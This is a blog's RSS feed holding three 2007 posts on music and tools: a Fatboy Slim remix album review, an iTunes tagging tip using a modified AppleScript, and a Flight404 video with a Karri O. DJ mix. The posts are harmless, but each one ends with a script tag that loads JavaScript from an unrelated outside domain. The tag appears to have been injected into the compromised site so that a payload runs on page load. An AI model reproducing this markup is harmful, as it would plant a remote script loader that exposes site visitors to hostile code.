<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>headphono.us &#187; Music</title>
	<atom:link href="http://headphono.us/category/music/feed/" rel="self" type="application/rss+xml" />
	<link>http://headphono.us</link>
	<description>Pras Sarkar blogs about web technology, music, social networks, digital identities and other random things.</description>
	<lastBuildDate>Sat, 08 May 2010 17:42:38 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Fatboy Slim &#8211; Greatest Hits Remixed</title>
		<link>http://headphono.us/2007/10/17/fatboy-slim-greatest-hits-remixed/</link>
		<comments>http://headphono.us/2007/10/17/fatboy-slim-greatest-hits-remixed/#comments</comments>
		<pubDate>Thu, 18 Oct 2007 02:05:00 +0000</pubDate>
		<dc:creator>Pras Sarkar</dc:creator>
				<category><![CDATA[Music]]></category>

		<guid isPermaLink="false">http://headphono.us/2007/10/17/fatboy-slim-greatest-hits-remixed/</guid>
		<description><![CDATA[
I ran into a single from this album over at a random music blog somewhere, and I&#8217;m really glad that I did. Simply put, it&#8217;s too good to miss. Most of Fatboy Slim&#8217;s memorable hits from the 90s through today are reworked, remashed and given a fresh unique twist to the old sounds.
Some of the [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.amazon.com/Greatest-Hits-Remixed-Fatboy-Slim/dp/B000V5J1Y0/ref=pd_bbs_sr_6/105-5793985-1411663?ie=UTF8&amp;s=music&amp;qid=1192670726&amp;sr=8-6"><img src="http://ecx.images-amazon.com/images/I/31iORZXCRdL._AA240_.jpg" title="Fatboy Slim - Greatest Hits Remixed" alt="Fatboy Slim - Greatest Hits Remixed" style="margin-right: 8px; margin-bottom: 10px" align="left" height="240" width="240" /></a><br />
I ran into a single from this album over at a random music blog somewhere, and I&#8217;m really glad that I did. Simply put, it&#8217;s too good to miss. Most of Fatboy Slim&#8217;s memorable hits from the 90s through today are reworked, remashed and given a fresh unique twist to the old sounds.</p>
<p>Some of the must listens are <strong>Right Here, Right Now (Redanka Mix)</strong>, <strong>Everybody needs a 303 (Plump Djs Mix)</strong>, <strong>Weapon of Choice (Junkie XL Mix)</strong> and <strong>Kiddas Fatboy Bouillabaisse (Bonus Track)</strong>. A few have been released as B sides and on other LP releases previously, so they might sound familiar.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://headphono.us/2007/10/17/fatboy-slim-greatest-hits-remixed/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Keeping iTunes organized with tags</title>
		<link>http://headphono.us/2007/09/22/keeping-itunes-organized-with-tags/</link>
		<comments>http://headphono.us/2007/09/22/keeping-itunes-organized-with-tags/#comments</comments>
		<pubDate>Sat, 22 Sep 2007 11:49:03 +0000</pubDate>
		<dc:creator>Pras Sarkar</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Music]]></category>
		<category><![CDATA[Productivity]]></category>

		<guid isPermaLink="false">http://headphono.us.s27219.gridserver.com/?p=31</guid>
		<description><![CDATA[I go through a lot of music through the day &#8211; my ipod through commutes, workstations at work and home, etc. Keeping my music organized is not only necessarily but also lets me look up the right song for the right moment. So I got to thinking, why not use the social tagging concept for [...]]]></description>
			<content:encoded><![CDATA[<p>I go through a lot of music through the day &#8211; my ipod through commutes, workstations at work and home, etc. Keeping my music organized is not only necessarily but also lets me look up the right song for the right moment. So I got to thinking, why not use the social tagging concept for my mp3&#8217;s. Luckily, iTunes already has support for a mp3 tag called &#8220;Grouping&#8221;.</p>
<p>Searching around a bit, I found that <a href="http://tunetag.com/?page_id=6">Chris Brown</a> had already thought of this way back in May 06. He created an applescript called <a href="http://tunetag.com/">TuneTag</a> which was exactly what I was looking for. Except that I wanted to use the Grouping field instead of the more general Comments field (which I use for other purposes).</p>
<p>After a little bit of tweaking (actually just a search and replace), I integrated the script with <a href="http://quicksilver.blacktree.com">Quicksilver</a> (copy the .scpt files to <code>~/Library/Application Support/Quicksilver/Actions</code>). Once you&#8217;ve gotten that done, pull up the Quicksilver menu, hit the &#8220;.&#8221; and type your (space-separated) tags, tab over and type in &#8220;tag&#8221; to pull up the script and hit Enter.</p>
<p>That should start you off adding tags to your current playing song. But proper organization goes a little further. I listen (read screen) a lot of songs to see if they&#8217;re up to my *ahem* world-class quality. I usually have a smart playlist set up to only include the songs added to the collection in the last day. I go through this list, and if I like any of the songs, I add a tag (using all the stuff above) called &#8220;atc&#8221; (add to collection). The final step is to add a new smart playlist to only keep off of the &#8220;atc&#8221; tag so that you can copy these songs over to your permanent collection while getting rid of the rest easily.</p>
<p><a href="http://headphono.us/code/TuneTag%20v1.2.1.zip">Here&#8217;s the modified script released under a Creative Commons license.</a><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://headphono.us/2007/09/22/keeping-itunes-organized-with-tags/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Karri O and Flight404</title>
		<link>http://headphono.us/2007/07/11/karri-o-and-flight404/</link>
		<comments>http://headphono.us/2007/07/11/karri-o-and-flight404/#comments</comments>
		<pubDate>Thu, 12 Jul 2007 00:25:46 +0000</pubDate>
		<dc:creator>Pras Sarkar</dc:creator>
				<category><![CDATA[Music]]></category>

		<guid isPermaLink="false">http://headphono.us.s27219.gridserver.com/?p=30</guid>
		<description><![CDATA[Processing is something I wish I could spend more time coding in. It&#8217;s grown up to be a de facto of the computer graphics world, now being taught in almost all computational art courses. Robert from Flight404 is an artist with mad Processing skills. Check out the visualization video below to get an idea of [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.processing.org">Processing</a> is something I wish I could spend more time coding in. It&#8217;s grown up to be a de facto of the computer graphics world, now being taught in almost all computational art courses. Robert from <a href="http://www.flight404.com/">Flight404</a> is an artist with mad Processing skills. Check out the visualization video below to get an idea of the tremendous talent.</p>
<p><object type="application/x-shockwave-flash" width="460" height="345" data="http://vimeo.com/moogaloop.swf?clip_id=174525&amp;server=vimeo.com&amp;fullscreen=1&amp;video_info=1"><param name="quality" value="best" /><param name="allowfullscreen" value="true" /><param name="scale" value="showAll" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=174525&amp;server=vimeo.com&amp;fullscreen=1&amp;video_info=1" /></object></p>
<p><a href="http://vimeo.com/174525">Magnetic Sphere (audio by Karri O.)</a> from <a href="http://vimeo.com/flight404">flight404</a> and <a href="http://vimeo.com">Vimeo</a>.</p>
<p>Not only is the video spectacular, but I rediscovered a great DJ &#8211; Karri O. (from Finland) &#8211; featured in the video. He deals mainly in Minimal Techno and has some great sets on his website &#8211; <a href="http://www.monorecords.com">monorecords.com</a>. I highly suggest the <a href="http://www.monorecords.com/djmixes/karri_o_elektrokueche.mp3">Elektrokueche</a> mix.</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://headphono.us/2007/07/11/karri-o-and-flight404/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
<enclosure url="http://www.monorecords.com/djmixes/karri_o_elektrokueche.mp3" length="138695999" type="audio/mpeg" />
		</item>
	</channel>
</rss>

<!-- Dynamic Page Served (once) in 0.607 seconds -->
